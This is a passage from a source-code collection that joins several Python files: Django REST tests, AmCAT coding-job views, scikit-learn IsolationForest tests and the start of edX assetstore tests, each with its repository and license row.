        data = { "nombre" : "test", "ciudad" : "ciudadtest", "sector" : "sectortest" }
        response = self.client.post("/empresas/", data, format="json")
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertEqual(Empresa.objects.get().nombre, "test")
        print("Creada empresa correctamente con interfaz REST")

    def test_mostrar_empresas(self):
        # Two saved companies must be listed, serialized in insertion order.
        emp1 = Empresa(nombre="test", ciudad="ciudadtest", sector="sectortest")
        emp1.save()
        emp2 = Empresa(nombre="test2", ciudad="ciudadtest2", sector="sectortest2")
        emp2.save()
        response = self.client.get("/empresas/")
        # Compares the raw JSON bytes of the response body.
        self.assertEqual(response.content, b'[{"nombre":"test","ciudad":"ciudadtest","sector":"sectortest"},{"nombre":"test2","ciudad":"ciudadtest2","sector":"sectortest2"}]')
        print("Listado de empresas realizado con éxito mediante interfaz REST")
class CalificacionRESTTest(APITestCase):
    """REST-API tests for listing a company's Calificacion (grade) records."""

    def test_mostrar_calificaciones(self):
        # Grades saved against a company must be listed under /empresas/<pk>/.
        e = Empresa(nombre="test", ciudad="ciudadtest", sector="sectortest")
        e.save()
        cal1 = Calificacion(alumno="alumtest", calificacion=10, empresa=e)
        cal1.save()
        cal2 = Calificacion(alumno="alum2test", calificacion=0, empresa=e)
        cal2.save()
        response = self.client.get("/empresas/1/")
        # Compares the raw JSON bytes; 'empresa' is serialized as its pk.
        self.assertEqual(response.content, b'[{"alumno":"alumtest","calificacion":10,"empresa":1},{"alumno":"alum2test","calificacion":0,"empresa":1}]')
        print("Listado de calificacion de una empresa exitoso con interfaz REST")
# Create your tests here.
| gpl-2.0 |
amcat/amcat | navigator/views/codingjob_views.py | 1 | 14130 | ###########################################################################
# (C) Vrije Universiteit, Amsterdam (the Netherlands) #
# #
# This file is part of AmCAT - The Amsterdam Content Analysis Toolkit #
# #
# AmCAT is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Affero General Public License as published by the #
# Free Software Foundation, either version 3 of the License, or (at your #
# option) any later version. #
# #
# AmCAT is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public #
# License for more details. #
# #
# You should have received a copy of the GNU Affero General Public #
# License along with AmCAT. If not, see <http://www.gnu.org/licenses/>. #
###########################################################################
import json
from collections import OrderedDict
from django.contrib.postgres.aggregates import ArrayAgg
from django.http import HttpResponse
from django.shortcuts import redirect
from django.views.generic.list import ListView
from django import forms
from django.core.urlresolvers import reverse
from amcat.forms.fields import StaticModelChoiceField
from api.rest.viewsets import CodingJobViewSet
from navigator.views.projectview import ProjectViewMixin, HierarchicalViewMixin, BreadCrumbMixin, ProjectScriptView, \
ProjectActionRedirectView, ProjectEditView, ProjectDetailView, ProjectFormView, ProjectActionFormView, \
ProjectActionForm
from navigator.views.datatableview import DatatableMixin
from amcat.models import CodingJob, Q, Project, ROLE_PROJECT_WRITER
from navigator.utils.misc import session_pop
from navigator.views.project_views import ProjectDetailsView
from api.rest.resources import SearchResource
from amcat.scripts.actions.add_codingjob import AddCodingJob
from amcat.forms.widgets import convert_to_bootstrap_select
from amcat.scripts.actions.get_codingjob_results import CodingjobListForm, GetCodingJobResults
from amcat.models import User
# Human-readable section titles keyed by internal section name.
# NOTE(review): presumably used to group options on the codingjob-results
# export form -- the consumer is outside this view; confirm.
SECTIONS = {
    "schemafield": "Field options",
    "aggregation": "Aggregation options",
    "meta": "Metadata options"
}
class CodingJobListView(HierarchicalViewMixin,ProjectViewMixin, BreadCrumbMixin, DatatableMixin, ListView):
    """Datatable listing of a project's coding jobs.

    Supports three sub-lists via the 'what' URL kwarg (active, linked,
    archived) and bulk (un)archiving through the 'favaction' GET parameter.
    """
    model = CodingJob
    parent = ProjectDetailsView
    context_category = 'Coding'
    resource = CodingJobViewSet
    rowlink = './{id}'

    def get(self, *args, **kargs):
        # TODO: doing this via GET is a *bad* idea. Use a ProjectActionFormView instead.
        favaction = self.request.GET.get('favaction')
        if (favaction is not None):
            # 'setfav' unarchives the selected jobs; anything else archives them.
            ids = {int(id) for id in self.request.GET.getlist('ids')}
            CodingJob.objects.filter(pk__in=ids).update(archived=(favaction != "setfav"))
        return super(CodingJobListView, self).get(*args, **kargs)

    @property
    def what(self):
        # Which sub-list is shown; defaults to the active (non-archived) jobs.
        return self.kwargs.get("what", "active")

    @classmethod
    def get_url_patterns(cls):
        # Extend the base pattern with an optional trailing what-selector.
        patterns = list(super(CodingJobListView, cls).get_url_patterns())
        patterns.append(patterns[0][:-1] + "(?P<what>|active|linked|archived)?/?$")
        return patterns

    def get_datatable(self, **kwargs):
        url_kwargs = dict(project=self.project.id)
        return super(CodingJobListView, self).get_datatable(url_kwargs=url_kwargs, **kwargs)

    def filter_table(self, table):
        # 'linked' shows jobs from other projects linked into this one;
        # otherwise filter on ownership plus archived state.
        if self.what == "linked":
            table = table.filter(linked_projects=self.project)
        else:
            table = table.filter(project=self.project, archived=(self.what == "archived"))
        return table.hide("project", "articleset", "favourite")

    def get_datatable_kwargs(self):
        return {"checkboxes": True}

    def get_context_data(self, **kwargs):
        ctx = super(CodingJobListView, self).get_context_data(**kwargs)
        # One-shot session flags set by the delete/add views.
        deleted = session_pop(self.request.session, "deleted_codingjob")
        added = session_pop(self.request.session, "added_codingjob")
        if added:
            added = [CodingJob.objects.get(pk=i) for i in added]
        what = self.what
        favaction = "unsetfav" if what == 'active' else "setfav"
        link_form = CodingJobLinkActionForm.get_form_class()(origin_project=self.project, user=self.request.user)
        # Exposes all of the above locals (and kwargs) to the template.
        ctx.update(**locals())
        return ctx
class CodingJobDetailsView(ProjectDetailView, DatatableMixin):
    """Detail page for one coding job: a datatable of its articles."""
    model = CodingJob
    parent = CodingJobListView
    resource = SearchResource
    rowlink = './{id}'

    def filter_table(self, table):
        # Restrict to articles in this job's set within the current project,
        # and link each row to the article-details view.
        table = table.filter(sets=self.object.articleset.id)
        table = table.filter(project=self.project.id)
        table = table.rowlink_reverse('navigator:article-details', args=[self.project.id, self.object.articleset.id, '{id}'])
        return table

    def get_datatable_kwargs(self):
        # Fixed columns first, then the project's display columns that are
        # actually present on this article set.
        fields = [("col", prop) for prop in ("title", "date", "url")]
        used_props = self.object.articleset.get_used_properties()
        display_cols = self.project.get_display_columns()
        props = [("col", prop) for prop in display_cols if prop in used_props]
        return {"extra_args": fields + props}
class CodingJobEditView(ProjectEditView):
    """Edit form for a codingjob."""
    parent = CodingJobDetailsView
    fields = ['project', 'name', 'coder', 'unitschema', 'articleschema']
    def get_form(self, form_class=None):
        """Limit coder/schema choices to members and schemas of this project."""
        form = super(CodingJobEditView, self).get_form(form_class)
        form.fields['coder'].queryset = User.objects.filter(projectrole__project=self.project)
        form.fields['unitschema'].queryset = self.project.get_codingschemas().filter(isarticleschema=False)
        form.fields['articleschema'].queryset = self.project.get_codingschemas().filter(isarticleschema=True)
        return form
class CodingJobAddView(ProjectScriptView):
    """Add one or more codingjobs to a project via the AddCodingJob script."""
    parent = CodingJobListView
    script = AddCodingJob
    url_fragment = "add"
    # NOTE: the previous no-op get_context_data override (super call + return)
    # was removed; the inherited implementation is equivalent.
    def run_form(self, form):
        """Run the script and remember the created job ids in the session.

        AddCodingJob may return a single CodingJob or a sequence of them;
        normalise to a list so the list view can highlight what was added.
        """
        result = super(CodingJobAddView, self).run_form(form)
        if isinstance(result, CodingJob):
            result = [result]
        self.request.session['added_codingjob'] = [job.id for job in result]
        return result
    def get_form_kwargs(self):
        # The script form needs the project to scope its choices.
        kwargs = super(CodingJobAddView, self).get_form_kwargs()
        kwargs['project'] = self.project
        return kwargs
    def get_form(self, form_class=None):
        form = super(CodingJobAddView, self).get_form(form_class)
        # Force the insert user to the current user (not user-editable).
        form.fields['insertuser'] = StaticModelChoiceField(self.request.user)
        convert_to_bootstrap_select(form)
        return form
class CodingJobDeleteView(ProjectActionRedirectView):
    """Delete a codingjob and redirect back to the project's job list."""
    parent = CodingJobDetailsView
    url_fragment = "delete"
    def action(self, project, codingjob):
        # recycle() presumably soft-deletes (moves to a recycle bin) rather
        # than destroying — see CodingJob.recycle for the actual semantics.
        CodingJob.objects.get(pk=codingjob).recycle()
    def get_success_url(self, **kargs):
        return reverse(CodingJobListView.get_view_name(), args=[self.project.id])
class CodingJobLinkActionForm(ProjectActionForm):
    """Bulk action: link selected codingjobs into another project."""
    class form_class(forms.Form):
        target_project = forms.ModelChoiceField(Project.objects.all())
        codingjobs = forms.ModelMultipleChoiceField(CodingJob.objects.all())
        def __init__(self, *args, origin_project, user, **kwargs):
            super().__init__(*args, **kwargs)
            jobs = CodingJob.objects.all()
            # Only jobs visible in the origin project can be linked.
            self.fields['codingjobs'].queryset = jobs.all_in_project(origin_project)
            # Targets: projects where the user has write access, directly or via guest role.
            self.fields['target_project'].queryset = Project.objects.filter(
                Q(projectrole__user=user, projectrole__role_id__gte=ROLE_PROJECT_WRITER) | Q(guest_role_id__gte=ROLE_PROJECT_WRITER)
            )
    def run(self):
        codingjobs = self.form.cleaned_data['codingjobs']
        target_project = self.form.cleaned_data['target_project']
        model = CodingJob.linked_projects.through
        # For each selected job: its owning project and the ids of projects it
        # is already linked to (aggregated into one array per job).
        vals = codingjobs.values_list('id', 'project').annotate(linked_ids=ArrayAgg('linked_projects'))
        # Create link rows only for jobs not owned by, and not already linked
        # to, the target project.
        objs = (model(codingjob_id=codingjob_id, project=target_project)
                for codingjob_id, project_id, linked_ids in vals
                if project_id != target_project.id
                if target_project.id not in linked_ids)
        model.objects.bulk_create(objs)
class CodingJobLinkActionFormView(ProjectActionFormView):
    """View wrapping CodingJobLinkActionForm; redirects to the target's 'linked' tab."""
    action_form_class = CodingJobLinkActionForm
    parent = CodingJobListView
    url_fragment = "link-codingjob"
    def get_form_kwargs(self):
        kwargs = super().get_form_kwargs()
        # NOTE(review): this passes the raw URL kwarg (likely an id string),
        # while the unlink view passes self.project (a model instance);
        # all_in_project apparently accepts both — confirm.
        kwargs['origin_project'] = self.kwargs['project']
        kwargs['user'] = self.request.user
        return kwargs
    def form_valid(self, form):
        super().form_valid(form)
        project = form.cleaned_data['target_project'].id
        # Land on the *target* project's "linked" tab so the new links are visible.
        return redirect(reverse("navigator:" + CodingJobListView.get_view_name(), args=[project, 'linked']))
class CodingJobUnlinkActionForm(ProjectActionForm):
    """Bulk action: unlink selected codingjobs from a project."""
    class form_class(forms.Form):
        codingjobs = forms.ModelMultipleChoiceField(CodingJob.objects.all())
        def __init__(self, *args, project, **kwargs):
            super().__init__(*args, **kwargs)
            jobs = CodingJob.objects.all()
            self.fields['codingjobs'].queryset = jobs.all_in_project(project)
            # Remember the project for run() below.
            self.project = project
    def run(self):
        codingjobs = self.form.cleaned_data['codingjobs']
        # NOTE(review): .delete() on a related queryset deletes the CodingJob
        # rows themselves, not just the link; a pure "unlink" would be
        # linked_codingjobs.remove(*codingjobs) — confirm intended behaviour.
        self.form.project.linked_codingjobs.filter(pk__in=codingjobs).delete()
class CodingJobUnlinkActionFormView(ProjectActionFormView):
    """View wrapping CodingJobUnlinkActionForm; requires write access."""
    action_form_class = CodingJobUnlinkActionForm
    parent = CodingJobListView
    url_fragment = "unlink-codingjob"
    required_project_permission = ROLE_PROJECT_WRITER
    def get_form_kwargs(self):
        kwargs = super().get_form_kwargs()
        kwargs['project'] = self.project
        return kwargs
    def form_valid(self, form):
        super().form_valid(form)
        # Back to this project's "linked" tab.
        return redirect(reverse("navigator:" + CodingJobListView.get_view_name(), args=[self.project.id, 'linked']))
class CodingJobExportSelectView(ProjectFormView):
    """Step 1 of export: pick which codingjobs and which export level."""
    form_class = CodingjobListForm
    parent = CodingJobListView
    url_fragment = "export-select"
    def get_form_kwargs(self):
        kwargs = super(CodingJobExportSelectView, self).get_form_kwargs()
        kwargs.update(project=self.project)
        # If the POST did not select specific jobs, default to all jobs of the
        # current tab (active or archived).
        if "data" in kwargs and "codingjobs" not in kwargs["data"]:
            archived = kwargs['data']['what'] != 'active'
            all_jobs = self.project.codingjob_set.filter(archived=archived).values_list("id", flat=True)
            # QueryDicts are immutable; copy before mutating.
            kwargs["data"] = kwargs["data"].copy()
            kwargs["data"].setlist("codingjobs", all_jobs)
        return kwargs
    def form_valid(self, form):
        self.jobs = form.cleaned_data["codingjobs"]
        self.level = form.cleaned_data["export_level"]
        return super(CodingJobExportSelectView, self).form_valid(form)
    def get_success_url(self):
        """Redirect to the export view, passing the selection via querystring.

        Large selections (>= 100 jobs) are stashed in the session instead of
        the URL to avoid over-long querystrings.
        """
        url = reverse("navigator:" + CodingJobExportView.get_view_name(), args=[self.project.id])
        if len(self.jobs) < 100:
            codingjobs_url = "&".join("codingjobs={}".format(c.id) for c in self.jobs)
        else:
            codingjobs_url = "use_session=1"
            self.request.session['export_job_ids'] = json.dumps([c.id for c in self.jobs])
        return "{url}?export_level={self.level}&{codingjobs_url}".format(**locals())
class CodingJobExportView(ProjectScriptView):
    """Step 2 of export: configure and run GetCodingJobResults (delayed)."""
    script = GetCodingJobResults
    parent = CodingJobListView
    url_fragment = "export"
    template_name = "project/codingjob_export.html"
    def read_get(self):
        """Return (job ids, export level) from the querystring or the session.

        The selection view stores large selections in the session and signals
        that with ?use_session=1 (see CodingJobExportSelectView.get_success_url).
        """
        if self.request.GET.get("use_session"):
            jobs = json.loads(self.request.session['export_job_ids'])
        else:
            jobs = self.request.GET.getlist("codingjobs")
        level = int(self.request.GET["export_level"])
        return jobs, level
    def get_form_kwargs(self):
        kwargs = super(CodingJobExportView, self).get_form_kwargs()
        jobs, level = self.read_get()
        kwargs.update(dict(project=self.project.id, codingjobs=jobs, export_level=level))
        return kwargs
    def get_initial(self):
        jobs, level = self.read_get()
        return dict(codingjobs=jobs, export_level=level)
    def get_context_data(self, **kwargs):
        """Group the form's fields into named sections for the template.

        Schemafield options come in groups named "schemafield_<id>_<opt>"; the
        "_included" field of each group is the main (toggle) field and the
        other options of the same group are attached to it as subfields.
        """
        context = super(CodingJobExportView, self).get_context_data(**kwargs)
        form = self.get_form()
        # Add fields for schema fields
        # section : [(id, field, subfields) ..]
        sections = OrderedDict()
        # fieldname -> subfields reference
        subfields = {}
        for name in form.fields:
            if form[name].is_hidden:
                continue
            prefix = name.split("_")[0]
            section = SECTIONS.get(prefix, "General options")
            # Non-"_included" schemafield options are added as subfields below.
            if prefix == "schemafield" and not name.endswith("_included"):
                continue
            subfields[name] = []
            sections.setdefault(section, []).append((name, form[name], subfields[name]))
        # Sort coding fields
        if 'Field options' in sections:
            sections["Field options"].sort()
        # Add subordinate fields
        for name in form.fields:
            prefix = name.split("_")[0]
            if prefix == "schemafield" and not name.endswith("_included"):
                subfields[name.rsplit("_", 1)[0] + "_included"].append((name, form[name]))
        for flds in subfields.values():
            flds.sort()
        context['sections'] = sections
        return context
    def form_valid(self, form):
        # Run asynchronously; the user is notified when the export is done.
        return self.run_form_delayed(self.project)
| agpl-3.0 |
imaculate/scikit-learn | sklearn/ensemble/tests/test_iforest.py | 9 | 6928 | """
Testing for Isolation Forest algorithm (sklearn.ensemble.iforest).
"""
# Authors: Nicolas Goix <nicolas.goix@telecom-paristech.fr>
# Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# License: BSD 3 clause
import numpy as np
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_warns_message
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_no_warnings
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import ignore_warnings
from sklearn.grid_search import ParameterGrid
from sklearn.ensemble import IsolationForest
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_boston, load_iris
from sklearn.utils import check_random_state
from sklearn.metrics import roc_auc_score
from scipy.sparse import csc_matrix, csr_matrix
# Fixed RNG so the dataset permutations below are reproducible across runs.
rng = check_random_state(0)
# load the iris dataset
# and randomly permute it (breaks the per-class sample ordering)
iris = load_iris()
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# also load the boston dataset
# and randomly permute it
boston = load_boston()
perm = rng.permutation(boston.target.size)
boston.data = boston.data[perm]
boston.target = boston.target[perm]
def test_iforest():
    """Smoke-test IsolationForest fit/predict over a grid of parameter settings."""
    X_train = np.array([[0, 1], [1, 2]])
    X_test = np.array([[2, 1], [1, 1]])
    param_grid = ParameterGrid({"n_estimators": [3],
                                "max_samples": [0.5, 1.0, 3],
                                "bootstrap": [True, False]})
    with ignore_warnings():
        for params in param_grid:
            forest = IsolationForest(random_state=rng, **params)
            forest.fit(X_train).predict(X_test)
def test_iforest_sparse():
    """Check IForest for various parameter settings on sparse input.

    For each parameter combination, a forest trained/evaluated on CSC/CSR
    input must give the same predictions as one trained on dense input.
    """
    rng = check_random_state(0)
    X_train, X_test, y_train, y_test = train_test_split(boston.data[:50],
                                                        boston.target[:50],
                                                        random_state=rng)
    grid = ParameterGrid({"max_samples": [0.5, 1.0],
                          "bootstrap": [True, False]})
    for sparse_format in [csc_matrix, csr_matrix]:
        X_train_sparse = sparse_format(X_train)
        X_test_sparse = sparse_format(X_test)
        for params in grid:
            # Trained on sparse format
            sparse_classifier = IsolationForest(
                n_estimators=10, random_state=1, **params).fit(X_train_sparse)
            sparse_results = sparse_classifier.predict(X_test_sparse)
            # Trained on dense format
            dense_classifier = IsolationForest(
                n_estimators=10, random_state=1, **params).fit(X_train)
            dense_results = dense_classifier.predict(X_test)
            # Predictions must agree regardless of input format.
            # (A duplicated identical assertion was removed here.)
            assert_array_equal(sparse_results, dense_results)
def test_iforest_error():
    """Test that it gives proper exception on deficient input."""
    X = iris.data
    # Test max_samples: negative ints and floats outside (0, 1] are rejected.
    assert_raises(ValueError,
                  IsolationForest(max_samples=-1).fit, X)
    assert_raises(ValueError,
                  IsolationForest(max_samples=0.0).fit, X)
    assert_raises(ValueError,
                  IsolationForest(max_samples=2.0).fit, X)
    # The dataset has less than 256 samples, explicitly setting
    # max_samples > n_samples should result in a warning. If not set
    # explicitly there should be no warning
    assert_warns_message(UserWarning,
                         "max_samples will be set to n_samples for estimation",
                         IsolationForest(max_samples=1000).fit, X)
    assert_no_warnings(IsolationForest(max_samples='auto').fit, X)
    # numpy integer types must be accepted like plain ints.
    assert_no_warnings(IsolationForest(max_samples=np.int64(2)).fit, X)
    assert_raises(ValueError, IsolationForest(max_samples='foobar').fit, X)
    assert_raises(ValueError, IsolationForest(max_samples=1.5).fit, X)
def test_recalculate_max_depth():
    """Check max_depth recalculation when max_samples is reset to n_samples"""
    X = iris.data
    clf = IsolationForest().fit(X)
    # Each tree's depth cap must be based on the actual number of samples used.
    for est in clf.estimators_:
        assert_equal(est.max_depth, int(np.ceil(np.log2(X.shape[0]))))
def test_max_samples_attribute():
    """Check the fitted max_samples_ attribute for default, capped and fractional settings."""
    X = iris.data
    clf = IsolationForest().fit(X)
    assert_equal(clf.max_samples_, X.shape[0])
    # max_samples larger than the dataset is capped to n_samples (with a warning).
    clf = IsolationForest(max_samples=500)
    assert_warns_message(UserWarning,
                         "max_samples will be set to n_samples for estimation",
                         clf.fit, X)
    assert_equal(clf.max_samples_, X.shape[0])
    clf = IsolationForest(max_samples=0.4).fit(X)
    # NOTE(review): exact equality between max_samples_ and 0.4 * n_samples is
    # brittle if either side is a non-integral float — confirm rounding rules.
    assert_equal(clf.max_samples_, 0.4*X.shape[0])
def test_iforest_parallel_regression():
    """Check parallel regression: predictions must not depend on n_jobs."""
    rng = check_random_state(0)
    X_train, X_test, y_train, y_test = train_test_split(boston.data,
                                                        boston.target,
                                                        random_state=rng)
    ensemble = IsolationForest(n_jobs=3,
                               random_state=0).fit(X_train)
    # Re-predicting with different n_jobs on the same fitted model...
    ensemble.set_params(n_jobs=1)
    y1 = ensemble.predict(X_test)
    ensemble.set_params(n_jobs=2)
    y2 = ensemble.predict(X_test)
    assert_array_almost_equal(y1, y2)
    # ...and a model fitted with a different n_jobs must all agree.
    ensemble = IsolationForest(n_jobs=1,
                               random_state=0).fit(X_train)
    y3 = ensemble.predict(X_test)
    assert_array_almost_equal(y1, y3)
def test_iforest_performance():
    """Test that Isolation Forest separates novel outliers from inliers well.

    Fit on 100 normal samples, then score 20 held-out normal samples against
    20 uniformly-drawn abnormal ones and require a high ROC AUC.
    """
    # Generate train/test data
    rng = check_random_state(2)
    X = 0.3 * rng.randn(120, 2)
    # (A dead assignment X_train = np.r_[X + 2, X - 2], immediately
    # overwritten by the next line, was removed.)
    X_train = X[:100]
    # Generate some abnormal novel observations
    X_outliers = rng.uniform(low=-4, high=4, size=(20, 2))
    X_test = np.r_[X[100:], X_outliers]
    y_test = np.array([0] * 20 + [1] * 20)
    # fit the model
    clf = IsolationForest(max_samples=100, random_state=rng).fit(X_train)
    # predict scores (the lower, the more normal)
    y_pred = - clf.decision_function(X_test)
    # check that the anomaly scores rank outliers above inliers (ROC AUC)
    assert_greater(roc_auc_score(y_test, y_pred), 0.98)
def test_iforest_works():
    # toy sample (the last two samples are outliers)
    X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1], [6, 3], [-4, 7]]
    # Test IsolationForest; contamination=0.25 flags 2 of the 8 samples.
    clf = IsolationForest(random_state=rng, contamination=0.25)
    clf.fit(X)
    # Negate so that higher value = more abnormal.
    decision_func = - clf.decision_function(X)
    pred = clf.predict(X)
    # assert detect outliers: both outliers must score above every inlier
    assert_greater(np.min(decision_func[-2:]), np.max(decision_func[:-2]))
    assert_array_equal(pred, 6 * [1] + 2 * [-1])
| bsd-3-clause |
zubair-arbi/edx-platform | common/lib/xmodule/xmodule/modulestore/tests/test_assetstore.py | 83 | 34681 | """
Tests for assetstore using any of the modulestores for metadata. May extend to testing the storage options
too.
"""
from datetime import datetime, timedelta
import ddt
from nose.plugins.attrib import attr
import pytz
import unittest
from opaque_keys.edx.keys import CourseKey
from opaque_keys.edx.locator import CourseLocator
from xmodule.assetstore import AssetMetadata
from xmodule.modulestore import ModuleStoreEnum, SortedAssetList, IncorrectlySortedList
from xmodule.modulestore.exceptions import ItemNotFoundError
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.modulestore.tests.utils import (
MIXED_MODULESTORE_BOTH_SETUP, MODULESTORE_SETUPS,
XmlModulestoreBuilder, MixedModulestoreBuilder
)
class AssetStoreTestData(object):
    """
    Shared data for constructing test assets.

    Each tuple in all_asset_data lines up positionally with asset_fields.
    The edited_on timestamps are spaced 10s apart so ordering by edit time
    is deterministic and distinct from the filename ordering.
    """
    now = datetime.now(pytz.utc)
    user_id = 144
    user_id_long = long(user_id)  # Python 2 long: exercises non-int user ids.
    user_email = "me@example.com"
    asset_fields = (
        AssetMetadata.ASSET_BASENAME_ATTR, 'internal_name', 'pathname', 'locked',
        'edited_by', 'edited_by_email', 'edited_on', 'created_by', 'created_by_email', 'created_on',
        'curr_version', 'prev_version'
    )
    # pylint: disable=bad-continuation
    all_asset_data = (
        ('pic1.jpg', 'EKMND332DDBK', 'pix/archive', False,
            user_id_long, user_email, now + timedelta(seconds=10 * 1), user_id_long, user_email, now, '14', '13'),
        ('shout.ogg', 'KFMDONSKF39K', 'sounds', True,
            user_id, user_email, now + timedelta(seconds=10 * 2), user_id, user_email, now, '1', None),
        ('code.tgz', 'ZZB2333YBDMW', 'exercises/14', False,
            user_id * 2, user_email, now + timedelta(seconds=10 * 3), user_id * 2, user_email, now, 'AB', 'AA'),
        ('dog.png', 'PUPY4242X', 'pictures/animals', True,
            user_id_long * 3, user_email, now + timedelta(seconds=10 * 4), user_id_long * 3, user_email, now, '5', '4'),
        ('not_here.txt', 'JJJCCC747', '/dev/null', False,
            user_id * 4, user_email, now + timedelta(seconds=10 * 5), user_id * 4, user_email, now, '50', '49'),
        ('asset.txt', 'JJJCCC747858', '/dev/null', False,
            user_id * 4, user_email, now + timedelta(seconds=10 * 6), user_id * 4, user_email, now, '50', '49'),
        ('roman_history.pdf', 'JASDUNSADK', 'texts/italy', True,
            user_id * 7, user_email, now + timedelta(seconds=10 * 7), user_id * 7, user_email, now, '1.1', '1.01'),
        ('weather_patterns.bmp', '928SJXX2EB', 'science', False,
            user_id * 8, user_email, now + timedelta(seconds=10 * 8), user_id * 8, user_email, now, '52', '51'),
        ('demo.swf', 'DFDFGGGG14', 'demos/easy', False,
            user_id * 9, user_email, now + timedelta(seconds=10 * 9), user_id * 9, user_email, now, '5', '4'),
    )
class TestSortedAssetList(unittest.TestCase):
    """
    Tests the SortedAssetList class.
    """
    def setUp(self):
        super(TestSortedAssetList, self).setUp()
        asset_list = [dict(zip(AssetStoreTestData.asset_fields, asset)) for asset in AssetStoreTestData.all_asset_data]
        # One list sorted by the default key (filename), one by edit time.
        self.sorted_asset_list_by_filename = SortedAssetList(iterable=asset_list)
        self.sorted_asset_list_by_last_edit = SortedAssetList(iterable=asset_list, key=lambda x: x['edited_on'])
        self.course_key = CourseLocator('org', 'course', 'run')
    def test_exception_on_bad_sort(self):
        # Searching by asset key in a list sorted on a different key must fail.
        asset_key = self.course_key.make_asset_key('asset', 'pic1.jpg')
        with self.assertRaises(IncorrectlySortedList):
            __ = self.sorted_asset_list_by_last_edit.find(asset_key)
    def test_find(self):
        # 'asset.txt' sorts first and 'weather_patterns.bmp' sorts last by filename.
        asset_key = self.course_key.make_asset_key('asset', 'asset.txt')
        self.assertEquals(self.sorted_asset_list_by_filename.find(asset_key), 0)
        asset_key_last = self.course_key.make_asset_key('asset', 'weather_patterns.bmp')
        self.assertEquals(
            self.sorted_asset_list_by_filename.find(asset_key_last), len(AssetStoreTestData.all_asset_data) - 1
        )
@attr('mongo')
@ddt.ddt
class TestMongoAssetMetadataStorage(unittest.TestCase):
"""
Tests for storing/querying course asset metadata.
"""
    def setUp(self):
        """Register custom equality functions and build shared (type, name) fixtures."""
        super(TestMongoAssetMetadataStorage, self).setUp()
        # Make assertEquals on datetime/AssetMetadata use the fuzzy/field-wise
        # comparators defined below.
        self.addTypeEqualityFunc(datetime, self._compare_datetimes)
        self.addTypeEqualityFunc(AssetMetadata, self._compare_metadata)
        # (asset_type, filename) pairs grouped by asset type.
        self.differents = (('different', 'burn.jpg'),)
        self.vrmls = (
            ('vrml', 'olympus_mons.vrml'),
            ('vrml', 'ponte_vecchio.vrml'),
        )
        self.regular_assets = (('asset', 'zippy.png'),)
        self.alls = self.differents + self.vrmls + self.regular_assets
    def _compare_metadata(self, mdata1, mdata2, msg=None):
        """
        Field-wise AssetMetadata equality over ATTRS_ALLOWED_TO_UPDATE only,
        so datetime fields go through the fuzzy datetime comparison.
        """
        if type(mdata1) != type(mdata2):
            self.fail(self._formatMessage(msg, u"{} is not same type as {}".format(mdata1, mdata2)))
        for attr in mdata1.ATTRS_ALLOWED_TO_UPDATE:
            self.assertEqual(getattr(mdata1, attr), getattr(mdata2, attr), msg)
    def _compare_datetimes(self, datetime1, datetime2, msg=None):
        """
        Don't compare microseconds as mongo doesn't encode below milliseconds
        """
        # Accept any difference strictly within one second.
        if not timedelta(seconds=-1) < datetime1 - datetime2 < timedelta(seconds=1):
            self.fail(self._formatMessage(msg, u"{} != {}".format(datetime1, datetime2)))
    def _make_asset_metadata(self, asset_loc):
        """
        Make a single test asset metadata (fixed field values, no thumbnail).
        """
        now = datetime.now(pytz.utc)
        return AssetMetadata(
            asset_loc, internal_name='EKMND332DDBK',
            pathname='pictures/historical', contenttype='image/jpeg',
            locked=False, fields={'md5': '77631ca4f0e08419b70726a447333ab6'},
            edited_by=ModuleStoreEnum.UserID.test, edited_on=now,
            created_by=ModuleStoreEnum.UserID.test, created_on=now,
            curr_version='v1.0', prev_version='v0.95'
        )
    def _make_asset_thumbnail_metadata(self, asset_md):
        """
        Add thumbnail to the asset_md (mutates and returns the same object).
        """
        asset_md.thumbnail = 'ABC39XJUDN2'
        return asset_md
    def setup_assets(self, course1_key, course2_key, store=None):
        """
        Setup assets. Save in store if given.

        The first two assets from AssetStoreTestData go to course1, the rest
        to course2; asset[4] is the edited_by user id per asset_fields order.
        """
        for i, asset in enumerate(AssetStoreTestData.all_asset_data):
            asset_dict = dict(zip(AssetStoreTestData.asset_fields[1:], asset[1:]))
            if i in (0, 1) and course1_key:
                asset_key = course1_key.make_asset_key('asset', asset[0])
                asset_md = AssetMetadata(asset_key, **asset_dict)
                if store is not None:
                    store.save_asset_metadata(asset_md, asset[4])
            elif course2_key:
                asset_key = course2_key.make_asset_key('asset', asset[0])
                asset_md = AssetMetadata(asset_key, **asset_dict)
                # Don't save assets 5 and 6.
                if store is not None and i not in (4, 5):
                    store.save_asset_metadata(asset_md, asset[4])
    @ddt.data(*MODULESTORE_SETUPS)
    def test_save_one_and_confirm(self, storebuilder):
        """
        Save one asset's metadata in each store, then retrieve it singularly and via the full listing.
        """
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            asset_filename = 'burnside.jpg'
            new_asset_loc = course.id.make_asset_key('asset', asset_filename)
            # Save the asset's metadata.
            new_asset_md = self._make_asset_metadata(new_asset_loc)
            store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
            # Find the asset's metadata and confirm it's the same
            # (field-wise, via the comparator registered in setUp).
            found_asset_md = store.find_asset_metadata(new_asset_loc)
            self.assertIsNotNone(found_asset_md)
            self.assertEquals(new_asset_md, found_asset_md)
            self.assertEquals(len(store.get_all_asset_metadata(course.id, 'asset')), 1)
    @ddt.data(*MODULESTORE_SETUPS)
    def test_delete(self, storebuilder):
        """
        Delete non-existent and existent metadata
        """
        with storebuilder.build() as (__, store):
            course = CourseFactory.create(modulestore=store)
            new_asset_loc = course.id.make_asset_key('asset', 'burnside.jpg')
            # Attempt to delete an asset that doesn't exist: returns 0 deleted.
